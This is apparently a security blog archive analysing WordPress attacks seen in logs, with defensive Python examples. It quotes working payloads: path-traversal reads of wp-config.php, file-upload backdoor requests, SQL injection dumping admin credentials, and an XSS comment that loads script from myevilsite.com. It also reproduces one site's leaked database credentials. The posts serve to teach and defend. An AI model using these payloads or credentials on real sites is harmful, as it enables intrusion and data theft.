
Tuesday, January 9, 2018

somebody is collecting wordpress configs?

I like to take phishing sites and navigate up and down the folder hierarchy looking for interesting files.

This one was interesting because it was an open directory with 200+ other sites' WordPress configs (wp-config.php).
hxxp://guncelhaber[.]site/BT/ Wonder if those are the attacker's other sites? Or if they are configs that the attacker has stolen/compromised?

Sunday, April 9, 2017

WordPress sites redirecting to Weight Loss Product Site, Pharma Hack

NOTE: All Links below were active & working as of 4/9/2017

Have seen a bunch of spammy-looking emails with a subject line similar to:

Incredible Formula Is Now Available For Everybody

All from random sender addresses such as:

mlhernandez@bolivar.gov.co
py10024@dongshin.net
kd-dovitec@vnn.vn


With email bodies like this, with a hyperlink on the last line:

Tsss... Though this exclusive product is already out there for everybody on the web, the amount is very limited, so don't tell your friends about it until you get some first.
Advanced solution and redesigned formula has been created to help you get rid of excessive weight. Natural ingredients and secret components are exactly what you need to get back in a great shape and get your dream body.
Act now as next week it will already be too late. Get a beautiful and fit body like you deserve.


The hyperlink went to sites like these, which appear to be outdated, hacked WordPress sites with unpatched plugins:

hxxp://klkgraphics[.]com/wordpress_d/wp-includes/SimplePie/lib.php?c2JyeWFuQG9zaGtvc2hjb3JwLmNvbQ==
hxxp://www.sandeepguptagmatclasses[.]com/wp-admin/css/dump/db.php?aGxvdWRlbkBkZWZlbnNlLm9zaGtvc2hjb3JwLmNvbQ==
hxxp://unlimitedsuccesscoaching[.]com/wp-includes/SimplePie/Decode/old.php?dG1vcnJpc0BqbGcuY29t
hxxp://covrefugee[.]org/wp-includes/SimplePie/Decode/lib.php?bGdhbGxhY2hlckBqbGcuY29t
hxxp://www.libertywebcreation[.]com/norfolk/wp-includes/fonts/ini.php?dGxiaWdoYW1AamxnLmNvbQ==


If the user clicks any of those links, the site simply redirects to this one site, so it's likely the same attacker is behind each of them:

hxxp://dietokdlikefut[.]com/us/emko/t11-cla?bhu=CX2zrXTTggnGsfMQaDHNS2ZNVZWHVGZRYhPiX


The page title there is:

Gwen Stefani Shares Blake Shelton's Secret To Rapid Weight Loss (Pics Below)

No matter where you click on that page, all links go to this follow-up URL:

hxxp://dietokdlikefut[.]com/us/emko/go.php?CID=313491&bhu=CX2zrXTTggnGsfMQaDHNS2ZNVZWHVGZRYhPiX


If you decide you want to buy the product, clicking checkout goes to this page:

hxxps://checkout-cla-extract[.]com/?click_id=04_29517092_5bcca100-2e0d-4262-a3d7-a225b73ac143&subid1=313491&netid=3&ver=old&ad=1kN9


Also found it interesting that at any point on the fake sales-pitch page, if you remove the PHP file name, it redirects you to a random sub-domain that contains the exact same content:

hxxp://557-healthandbeauty.dietokdlikefut[.]com/us/xvoh/cla-safflower-oil/
hxxp://852-diet.dietokdlikefut[.]com/us/hefk/cla-safflower-oil/
hxxp://110-health.dietokdlikefut[.]com/us/lldl/cla-safflower-oil/


Looks to me similar to past Pharma Hacks that I've seen, where the attacker is simply going around hacking weak WordPress sites both to bump up their search engine rankings and to generate traffic to their own site to make money.

Let me know if I'm missing anything else important.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Saturday, February 18, 2017

Wordpress Config as homepage

@wavellan posted a spam and phishing URL.

hxxp://enerjietudu[.]com/

Interestingly, if you browse to the homepage you get the wp-config.php file returned.



Full contents here

And like every good wp-config.php file, it contains information such as:

define('DB_NAME', 'enerjik3460');
define('DB_USER', 'enerjik34');
define('DB_PASSWORD', 'energy34');
define('DB_HOST', '94.73.144.196');


And all the encryption deets:

define('AUTH_KEY', ...
define('SECURE_AUTH_KEY',
define('LOGGED_IN_KEY',
define('NONCE_KEY',
define('AUTH_SALT',
define('SECURE_AUTH_SALT',
define('LOGGED_IN_SALT',
define('NONCE_SALT', ...


All the comments are in Turkish per google translate.

The bottom has an error showing the full path we are sitting in:

Fatal error: Call to undefined function wp() in /home/enerjietudu.com/httpdocs/wp-blog-header.php on line 22

I notice that no matter which page I go to (wp-admin/admin.php, etc.) the wp-config.php contents show and an error is thrown.

If I had to guess, I think somebody hacked this WordPress site by finding a vulnerability in the WordPress blog header: they found some vulnerability that outputs the content of a file, and so of course they chose the wp-config.php file, and now it's being displayed in the header of every page you navigate to. Then they used that output to log in and take control of the database, and then were able to use the database to write files to the www root folder and use it in phishing campaigns.

I don't claim to know everything, I'm just guessing. Anybody want to explain what really happened? Thanks!

Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, August 30, 2016

Work the Flow File Upload Sample Attack

Saw this web request and thought it was interesting enough to mention. It's the Work the Flow File Upload plugin for WordPress, and it appears to be linked to this 2015 file upload exploit.

POST /wp-content/plugins/work-the-flow-file-upload/public/assets/jquery-file-upload-9.5.0/server/php/index.php HTTP/1.1
Host: mysite.com
Content-Length: 270
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=18301442f2ce4a0aba32c60e4bf2f5db
action=upload
files=wp-classes.php


Patch your wordpress plugins or get rid of them if you don't use them!

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Monday, August 29, 2016

Wordpress Test Environment Requests

Why would somebody make a request to this path?

GET /test/wp-admin/

It appears this is a common, perhaps the default, location to install your "test" environment for a WordPress blog. The problem is that if I do a Google search for test wp-admin pages, I get a bunch that are indexed and accessible.



I would never advise having your test environment accessible to the internet. Only have it accessible locally; you're just asking for trouble, because test environments are never as locked down and monitored as production. And if your test blog is on the same server as production, then you've just created a backdoor to production: if an attacker can get into your test environment, they're on your production server.

Another, perhaps even bigger, problem is that when I do the Google search, most of these folders return a directory listing and allow access to potentially sensitive files. Uh-oh. Lock down your test environments, or remove them if you don't need them, because the bad guys are looking for them!

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wordpress Gravity Forms File Upload Attempt

Here is a sample from this weekend of last year's Gravity Forms WordPress file upload exploit:

POST/?gf_page=upload HTTP/1.1
Host: mysite.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Length: 2476
Content-Type: multipart/form-data; boundary=3196e7ebf0e84b8499c31b44f2f68dd8
gform_unique_id=../../../../
name=css.php5
form_id=1
field_id=3
file=11.jpg


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wordpress Login Wall attack example

WordPress Login Wall was supposed to be for your protection against brute force and other login attacks. Instead, per this older blog post, if you use this plugin you may put yourself at risk of attacks that allow raw eval of PHP code passed in the login parameter. Ouch.

GET/wp-content/plugins/login-wall-etgfb/login_wall.php?login=cmd

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Thursday, August 18, 2016

Example of Wordpress File Disclosure

I saw this attack in the logs and thought it was interesting enough to mention. It's a known exploit for the WordPress Elegance Theme.

POST /wp-content/themes/elegance/lib/scripts/dl-skin.php HTTP/1.1
Host: mywebsite.mx
Content-Length: 60
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
_mysite_download_skin=../../../../../wp-config.php


It's actually quite simple: there is a PHP page called dl-skin.php that takes a POST parameter called _mysite_download_skin, and the file path in it was not properly sanitized or checked. It is supposed to only allow a user to enter a skin file location in the current skins folder. But since it's not checking for path traversal, the attacker can use ../ path components to walk up the folder structure and reach files they want. In this case they go up 5 folders to where they believe the wp-config.php file is; that is your WordPress configuration file, which probably contains keys, passwords, and all sorts of goodies. This can also be used to access the /etc/passwd file or anything else interesting on a server.

To prevent this, of course, upgrade your themes, plugins and WordPress. Ideally you should remove themes and plugins you aren't using. In addition, the account that is running Apache matters here. If that account has proper least-privilege permissions, this limits which files the attacker can actually read through it. But if your Apache web account is root, for example, or some other highly privileged account, then the attacker can read pretty much anything on your file system.

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

SQL Injection Example on Five Star Review

I pasted a few interesting web attacks from very recent logs. Thought it'd be interesting to run through some of them.

GET/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `#@__admin` limit 0,1),5,6,7,8,9#@`\'` &_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1

This first attack looks like it's related to the Five Star Review System, possibly an older, well-known vulnerability in a product from a company that provides websites with review capabilities. So if you just add their PHP code to your website, you too can have your customers review your products, provide feedback, rank them with stars, etc. The problem appears to be a SQL injection vulnerability in the _FILES query string parameter. This parameter must not be getting sanitized properly, and thus an attacker is able to execute SQL against the database behind this website. You'll notice some values that sort of look like SQL code. Now it looks like in order to get the exploit to work they have to escape characters, which is why you see @`\'` together, to get the correct syntax down to MySQL.

' or mid=' /*!50000union*//*!50000select*/1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'


Next, it's interesting to see the /**/, because that looks like a comment, right? It can be ignored, right? WRONG! /*!50000 actually has significance in MySQL. The "50000" refers to a MySQL version, and it tells MySQL that only version 5.0.0 and above should run the text inside that comment.

' /*!50000union*//*!50000select*/1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'


Thus there's actually a union and select statement hidden in there !

' union select 1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'


Now you can see from here that the attacker knows the SQL query must return 9 columns, which is why the union select is padded with 8 extra integer values. Only the 4th column is of any interest, so that must be the column the website displays in HTML to the browser, so the attacker can see the results.

select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1


Thus we're down to just that interesting column. You can see it concatenates 0x7c, which per hex conversion is a pipe (|), with the userid and password. Thus you may see a result like '|myusername|mypassword' returned to the screen. Finally, notice that it queries the __admin table, which must be where the administrator usernames and passwords live for the Five Star Review system, and it's only pulling a few records: the limit clause 0,1 means start at record 0 (the 1st one) and pull 1 record. So it's just returning the top record, which is likely the administrator of the Five Star Review system.

GET/admin/_content/_about/aspcms_aboutedit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1 HTTP/1.1

This is a very similar attack to the one described in detail above. I'm guessing this is related to the ASP CMS (content management system), just based on the table they are trying to grab records from (aspcms_user). Notice they are looking for userid=1, which is likely the system administrator record.
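The same peeling-apart the walk-through does by hand, as an added example that is not part of the original post: strip the backslash escaping and the /*!50000 ... */ version comments, decode the 0x7c literal, then count the UNION SELECT columns and pick out the ones that carry data (the 4th column here; loginname and password in the aspcms request). Both request lines are copied from the post.

```python
import re

# /*!50000union*/ : MySQL executes the text inside when its version is >= 5.0.0;
# other databases (and naive WAF regexes) see nothing but a comment.
VERSION_COMMENT = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.S)
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)\b")
UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+|distinct\s+)?select\s+(.*)", re.I | re.S)

# Request lines copied from the post above (the whole GET line, as logged).
FIVE_STAR_REQUEST = r"""GET/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `#@__admin` limit 0,1),5,6,7,8,9#@`\'` &_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1"""
ASPCMS_REQUEST = ("GET/admin/_content/_about/aspcms_aboutedit.asp?id=1 and 1=2 union select "
                  "1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,"
                  "26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1 HTTP/1.1")


def normalize_mysql(payload):
    """Undo the escaping and comment tricks so the SQL reads as MySQL will run it."""
    s = payload.replace("\\'", "'").replace('\\"', '"')
    s = VERSION_COMMENT.sub(r" \1 ", s)   # keep the executed text, drop the wrapper
    s = PLAIN_COMMENT.sub(" ", s)         # ordinary comments really are ignored
    return re.sub(r"\s+", " ", s).strip()


def decode_hex_literals(s):
    """Turn printable hex literals such as 0x7c into their quoted string form."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        raw = bytes.fromhex(digits)
        if raw and all(32 <= b < 127 for b in raw):
            return "'" + raw.decode("ascii") + "'"
        return m.group(0)
    return HEX_LITERAL.sub(repl, s)


def select_columns(rest):
    """Split the text after UNION SELECT into its top-level column expressions,
    stopping at a top-level FROM, a '#' comment, or the end of the text."""
    cols, cur, depth = [], [], 0
    low = rest.lower()
    for i, ch in enumerate(rest):
        if depth == 0 and (ch == "#" or low.startswith(" from ", i)):
            break
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == "," and depth == 0:
            cols.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    cols.append("".join(cur).strip())
    return cols


def analyse(request_line):
    """Return the column count and the non-numeric (data-carrying) columns of a
    UNION SELECT hidden in a request line, or None if there is none."""
    sql = decode_hex_literals(normalize_mysql(request_line))
    m = UNION_SELECT.search(sql)
    if not m:
        return None
    cols = select_columns(m.group(1))
    extracted = [(i, c) for i, c in enumerate(cols, 1) if not c.isdigit()]
    return {"sql": sql, "columns": len(cols), "extracted": extracted}


if __name__ == "__main__":
    for line in (FIVE_STAR_REQUEST, ASPCMS_REQUEST):
        r = analyse(line)
        print(r["columns"], "columns; data in:", r["extracted"])
```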

Remember, to prevent SQL injection use parameterized queries, so that data types cannot change and apostrophes cannot break out of the string literal. Also use a sanitization library that escapes/encodes bad characters. Also make sure to do server-side validation: if a parameter is supposed to take an ID number, then only allow integers! If it's supposed to be a file name, then make sure it matches a regex, even one as simple as .*\..{1,3}.

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, August 12, 2016

Wordpress File Path Traversal Examples

I pasted several similar WordPress exploit attempts from some web logs. They generally match WAF or IDS rules for file traversal. They look like this...

GET/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
GET/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
GET/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
GET/wp-content/themes/mtheme-unus/css/css.php?files=../../../../wp-config.php


These exploits take advantage of insecure WordPress plugins. Each of them has a query string parameter that lets you download a file. In theory the plugin was only supposed to let you download files from the current plugin directory (music, audio, etc.). But in this case the query string parameter wasn't properly validating the path passed in, and it allowed path traversal (../../) to walk up the file system hierarchy. The attacker is then attempting to get to the wp-config.php file, which can contain your security keys, database user and password, etc., so some valuable data!

To prevent this, either patch your plugins when vulns like this come out ... or disable/remove unused plugins.
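The containment check that both the dl-skin.php post above and these download-style plugins lack, as an added example (not plugin or WordPress code): resolve the requested name under the script's own directory, refuse anything that lands outside it, and replay the logged request lines to see each one denied. The document root /var/www/html and the set of download parameter names are assumptions.

```python
import posixpath as pp
from urllib.parse import urlsplit, parse_qs

WEB_ROOT = "/var/www/html"   # assumption: the site's document root

# Parameter names the plugins/theme in the logged requests use for the file to serve.
FILE_PARAMS = ("file", "file_path", "files", "_mysite_download_skin")

# Request lines copied from the log excerpts above, plus one legitimate download.
SAMPLE_REQUESTS = [
    ("GET/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php", ""),
    ("GET/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php", ""),
    ("GET/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10", ""),
    ("GET/wp-content/themes/mtheme-unus/css/css.php?files=../../../../wp-config.php", ""),
    ("POST /wp-content/themes/elegance/lib/scripts/dl-skin.php HTTP/1.1",
     "_mysite_download_skin=../../../../../wp-config.php"),
    ("GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=song.mp3 HTTP/1.1", ""),
]


def resolve_in_dir(base_dir, requested):
    """Return the absolute path for `requested` if it stays inside `base_dir`,
    else None.  Absolute paths, NUL bytes and any '..' that climbs out of the
    base directory after normalisation are refused."""
    if not requested or "\x00" in requested or requested.startswith(("/", "\\")):
        return None
    base = pp.normpath(base_dir)
    candidate = pp.normpath(pp.join(base, requested.replace("\\", "/")))
    # commonpath() is the containment test; a plain startswith() would accept
    # /var/www/html/plugin-evil/x when the base is /var/www/html/plugin.
    if pp.commonpath([base, candidate]) != base:
        return None
    return candidate


def check_request(request_line, body=""):
    """Parse a logged request ('GET /path?qs' or the glued 'GET/path?qs' form
    seen in the log lines above) plus an optional urlencoded POST body, and run
    the first recognised file parameter through resolve_in_dir(), using the
    directory of the requested script as the allowed base directory."""
    method, _, rest = request_line.partition(" ")
    if not rest or "/" in method:          # glued form: no space after the method
        method, rest = request_line[:3], request_line[3:]
    target = rest.split(" ")[0]
    parts = urlsplit(target)
    base_dir = pp.normpath(WEB_ROOT + pp.dirname(parts.path))
    params = parse_qs(parts.query)
    params.update(parse_qs(body))
    for name in FILE_PARAMS:
        if name in params:
            value = params[name][0]
            return {"param": name, "value": value,
                    "resolved": resolve_in_dir(base_dir, value)}
    return None


if __name__ == "__main__":
    for line, body in SAMPLE_REQUESTS:
        r = check_request(line, body)
        verdict = "DENY " if r["resolved"] is None else "ALLOW"
        print(verdict, r["param"], "=", r["value"], "->", r["resolved"])
```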

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, May 31, 2016

A File Upload Vulnerability barrage

I noticed a series of WordPress/Joomla file upload attacks from a single IP address / attacker in a short period of time. Some of the requests are listed here. What I found interesting was not the fact that most were well-known WordPress vulnerabilities that are still unpatched by many web administrators. What I found interesting was the methodology of the malicious actor. It's likely what they have written is some sort of script/automated scanning tool, perhaps even a botnet or something that is doing this automatically. I envision that the code/script doing this probably has an array or list of well-known WordPress file upload vulnerabilities. It's probably a flexible, dynamic list, so that as soon as the attacker hears about a new WordPress file upload vulnerability, he can literally just add a URL path and a POST parameter for the file name, and the script/botnet will start scanning and attacking the internet trying to upload malicious files. Then there is likely a follow-up script that runs shortly after, connects to the uploaded backdoors and validates which ones were successful. In all the cases below the attacker uploads the same malicious file name, upfilees.php, so that the attacker can easily go back later and determine whether this was a device they compromised. The backdoor is probably a web shell that gives them full access to the web server's file system and the ability to run commands on the web server. Below I did my best to research a few of the attacks seen in this cycle and explain a bit.

yiw_contact[]=upfilees.php
yiw_action=sendemail


In the above HTTP POST, there were 2 parameters that started with yiw. This indicates that the attacker is likely trying to exploit the Beauty & Clean Theme File Upload WordPress Vulnerability, which is literally as simple as posting your backdoor file to the contact field via the sendemail action. If it succeeds, your file has been uploaded to the web server.

POST/uploadify/uploadify.php
Filedata=upfilees.php


In the next HTTP POST, the attacker is likely attempting to exploit the Event Calendar Arbitrary WordPress File Upload Vulnerability, which is also as simple as passing the file you want uploaded as a POST parameter to the uploadify.php page. Again, if successful, the attacker has just uploaded a PHP web page to your server and can now do whatever they please.

POST/tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass=
Filedata=upfilees.php.suspected
Filename=send.php.suspected


In the next HTTP Post, the attacker is trying to exploit the tinybrowser Remote File Upload Joomla Vulnerability which is another simple vulnerability that involves posting the file you want uploaded as a parameter to the upload_file.php page. We're getting a bit repetitive and non-creative in these vulnerabilities, aren't we?

update_file=upfilees.php
action=revslider_ajax_action


In the next HTTP POST, the attacker is trying to exploit the RevSlider WordPress File Upload Vulnerability, which again requires nothing more than choosing the right action parameter and posting the file, and guess what, the web server will be compromised with a nice PHP backdoor. Oops.

POST /sites/all/libraries/elfinder/php/connector.minimal.php
upload[]=upfilees.php
cmd=upload


In the next HTTP Post, the attacker appears to just be looking for poorly configured systems that have purposely enabled the ELFinder File Manager feature which allows you to remotely manage your web server's file system. Hmmm, can that be exploited? Yep, just post the upload command and your backdoor, and the attacker is in business.

POST /license.php
filename=upfilees.php


The final attack, I believe, may be just a standard filename/location that certain attackers or botnets use to exploit systems. They probably exploited this server at some point and added a backdoor called 'license.php' which allows arbitrary file upload. So this attacker is just taking advantage of another attacker's prior compromise of this device. Easy pickings if it exists.

WordPress & Joomla plugins should not be trusted (like anything else, for that matter) and should only be added if absolutely needed. If you do need them, then you had better be certain to keep them patched and updated. If you have a plugin that is really not necessary, please, please, please remove those extraneous plugins, as otherwise they're going to open up huge ugly gaping holes in your security posture.
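A detection pass over the requests quoted in this post, plus the Gravity Forms and Work the Flow requests from the posts above, as an added example (not the author's or any vendor's code): flag parameter values that name a server-executable file or contain ../, then count how many distinct endpoints received the same filename from one source IP, which is the "same upfilees.php everywhere" signature described above. The source IPs and the two endpoints the post does not show are constructed placeholders.

```python
import re
from collections import defaultdict

# Filenames the web server would execute if they land in a public folder.  The
# trailing class also catches 'upfilees.php.suspected' and 'x.php?foo' forms.
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)(?:$|[.?#/])", re.I)
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")

# Constructed events built from the POST bodies quoted in this post, the
# Gravity Forms and Work the Flow posts above, plus one legitimate upload.
# IPs are documentation-range placeholders; two paths the post does not show
# are assumed ("/" for the theme contact form, admin-ajax.php for RevSlider).
SAMPLE_EVENTS = [
    {"ip": "203.0.113.7", "path": "/",
     "params": {"yiw_contact[]": "upfilees.php", "yiw_action": "sendemail"}},
    {"ip": "203.0.113.7", "path": "/uploadify/uploadify.php",
     "params": {"Filedata": "upfilees.php"}},
    {"ip": "203.0.113.7", "path": "/tiny_mce/plugins/tinybrowser/upload_file.php",
     "params": {"Filedata": "upfilees.php.suspected", "Filename": "send.php.suspected"}},
    {"ip": "203.0.113.7", "path": "/wp-admin/admin-ajax.php",
     "params": {"update_file": "upfilees.php", "action": "revslider_ajax_action"}},
    {"ip": "203.0.113.7", "path": "/sites/all/libraries/elfinder/php/connector.minimal.php",
     "params": {"upload[]": "upfilees.php", "cmd": "upload"}},
    {"ip": "203.0.113.7", "path": "/license.php",
     "params": {"filename": "upfilees.php"}},
    {"ip": "198.51.100.22", "path": "/?gf_page=upload",
     "params": {"gform_unique_id": "../../../../", "name": "css.php5",
                "form_id": "1", "field_id": "3", "file": "11.jpg"}},
    {"ip": "198.51.100.22",
     "path": "/wp-content/plugins/work-the-flow-file-upload/public/assets/jquery-file-upload-9.5.0/server/php/index.php",
     "params": {"action": "upload", "files": "wp-classes.php"}},
    {"ip": "198.51.100.9",
     "path": "/wp-content/plugins/work-the-flow-file-upload/public/assets/jquery-file-upload-9.5.0/server/php/index.php",
     "params": {"action": "upload", "files": "holiday.jpg"}},
]


def classify(event):
    """Return the reasons a request looks like a malicious upload attempt."""
    reasons = []
    for name, value in event["params"].items():
        if EXEC_EXT.search(value):
            reasons.append(f"executable filename in {name}={value}")
        if TRAVERSAL.search(value):
            reasons.append(f"path traversal in {name}={value}")
    return reasons


def barrage_summary(events, min_endpoints=3):
    """Per source IP, count how many distinct endpoints received the same
    executable filename; the repeated 'upfilees.php' is the barrage signature."""
    by_ip = defaultdict(lambda: defaultdict(set))
    for ev in events:
        for value in ev["params"].values():
            if EXEC_EXT.search(value):
                by_ip[ev["ip"]][value].add(ev["path"])
    summary = {}
    for ip, files in by_ip.items():
        hits = {fn: len(paths) for fn, paths in files.items() if len(paths) >= min_endpoints}
        if hits:
            summary[ip] = hits
    return summary


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for reason in classify(ev):
            print(ev["ip"], ev["path"], "->", reason)
    print("barrage:", barrage_summary(SAMPLE_EVENTS))
```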

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wednesday, April 20, 2016

WordPress.com Free SSL for Everybody!

I've blogged several times about the benefits and eventual widespread adoption of HTTPS on the Internet (1 2 3 4 5).

I found this article about WordPress.com SSL to be more proof that it's happening. The article says "All custom domains hosted on WordPress.com will soon have their sites automatically encrypted for free. WordPress said late Friday afternoon that more than one million sites will have encryption automatically deployed .... WordPress’ SSL cert rollout is coming courtesy of the Let’s Encrypt project, a coalition of tech providers, and privacy and legal minds, who developed a mechanism to issue free SSL certificates to any sites that wants one."

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, April 28, 2015

WordPress XSS 0day Walkthru

I thought the Wordpress XSS vulnerability was an interesting one. I thought I'd attempt to walk through how I understand it to work.

On the comments section of any WordPress blog, a visitor can add a comment to the blog. Wordpress is actually correctly validating the input and sanitizing for XSS (Cross-Site Scripting) vulnerabilities. So what's the issue?

It's more of a quirk in the combination of how the MySQL database was set up and how browsers handle malformed HTML.

1.) First, if the comment being entered is too long, the MySQL database field holding the comment cannot fit the entire comment and ends up truncating it, actually chopping off the closing </a> tag.

2.) Second, because that </a> tag has now been truncated, when an Administrator views the comment for moderation (to approve or reject it) the browser will attempt to display malformed HTML (an opening <a> tag without a closing one). Now, most modern browsers don't reject malformed HTML; instead they try to automatically fix it for you. How nice!

So if you enter your malicious comment and hit submit
<a title='xxx onmouseover=eval(unescape(/var a=document.createElement('script');a.setAttribute('src','https://myevilsite.com/thiscodegetsrunbyadmin.js');document.head.appendChild(a)/.source)) style=position;absolute;left:0;top:0;width:5000px;height:5000px AAAAAA...(tons of A's up to 65k bytes)....AAAAA' href="http://www.google.com">my link to google</a>

WordPress correctly validates that it's an OK a tag ... it's a super ugly title, but titles don't matter and can't be executed, so in the end this is just a valid link to google.com. But then WordPress saves this comment to its MySQL database.

If you were to look in the WordPress database it would look something like this (it adds a paragraph tag around the text you entered too)....

<P><a title='xxx onmouseover=eval(unescape(/var a=document.createElement('script');a.setAttribute('src','https://myevilsite.com/thiscodegetsrunbyadmin.js');document.head.appendChild(a)/.source)) style=position;absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAAAAAAaa</P>

Notice that a bunch of the A's as well as the closing portion of the </a> tag are now missing because of the MySQL truncation issue.

So when the Administrator goes to view this comment for moderation, the browser actually tries to fix the broken code with something like below.

<a title='xxx' onmouseover='eval(unescape(/var a=document.createElement('script');a.setAttribute('src','https://myevilsite.com/thiscodegetsrunbyadmin.js');document.head.appendChild(a)/.source)) style=position;absolute;left:0;top:0;width:5000px;height:5000px' p='AAAAAAAAAAAAAAAAA'></a>

Notice that it so nicely decided to split my harmless title out where it found whitespace and turn it into an onmouseover event.

What could actually be done with this? Well, if the Administrator is doing his moderation of the blog from a browser on the Production Web Server, then that file (https://myevilsite.com/thiscodegetsrunbyadmin.js) gets executed by the Administrator under his Administrator account on the Production Server. So I could put JavaScript code in there, for example, that writes a malicious file to the Production Web Server's hard drive in one of the folders that is publicly accessible. I could make sure that malicious file is one of the many Web Server backdoors, so that the attacker can now browse to this file, which is hosted on your WordPress blog, and do crazy things on that page like Add/Remove/Download files, Add/Remove user accounts, etc. I own that Web Server and that Administrator account.

It's important to point out here XSS is a 2-way street. You cannot simply validate the user input as it's coming in and getting saved. You also need to validate/sanitize user input after it's pulled from a data source and before it's displayed on the screen. I've blogged about this input validation topic before, as it's very similar to the concept of importing data in from another system or 3rd party source and then displaying it on your website. Don't trust it.
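The storage step of the walk-through, simulated as an added example (not WordPress code): a comment that is balanced HTML when submitted loses its closing </a> when a TEXT column silently truncates it at 65535 bytes, a length check before storage refuses it instead, and output-side escaping treats whatever comes back from the database as text rather than markup. The 'MARKER' title value is a constructed stand-in for the page's onmouseover payload.

```python
import html

MYSQL_TEXT_MAX = 65535   # bytes a MySQL TEXT column can hold (documented limit)


def build_comment(padding):
    """A comment shaped like the one in the walk-through: one <a> whose title
    attribute carries an event handler after whitespace and is padded past the
    column limit.  'MARKER' is a constructed stand-in for the real payload."""
    title = "xxx onmouseover=MARKER style=position:absolute " + "A" * padding
    return f"<p><a title='{title}' href=\"http://www.google.com\">my link to google</a></p>"


def store_lenient(comment):
    """What a TEXT column does outside strict SQL mode: silently truncate."""
    return comment.encode("utf-8")[:MYSQL_TEXT_MAX].decode("utf-8", "ignore")


def store_strict(comment):
    """Defensive storage: refuse any comment that would not fit intact."""
    if len(comment.encode("utf-8")) > MYSQL_TEXT_MAX:
        raise ValueError("comment exceeds column width; rejecting instead of truncating")
    return comment


def anchors_balanced(fragment):
    """True when every <a ...> has a matching </a>; an unbalanced fragment is
    exactly what lets the browser 'repair' the markup on the moderation page."""
    low = fragment.lower()
    return low.count("<a ") == low.count("</a>")


def render_for_moderation(stored):
    """Output-side defence: treat what comes back from the database as untrusted
    text, not markup (the '2-way street' point above).  A real site would instead
    re-run its HTML sanitizer here so legitimate links survive."""
    return html.escape(stored, quote=True)


if __name__ == "__main__":
    submitted = build_comment(70000)
    print("submitted balanced:", anchors_balanced(submitted))
    truncated = store_lenient(submitted)
    print("stored balanced:", anchors_balanced(truncated), "| tail:", truncated[-12:])
    try:
        store_strict(submitted)
    except ValueError as err:
        print("strict store:", err)
    print("escaped output starts:", render_for_moderation(truncated)[:24])
```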

Oh my, XSS is really bad no matter what shape or form it comes in! Take it seriously!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.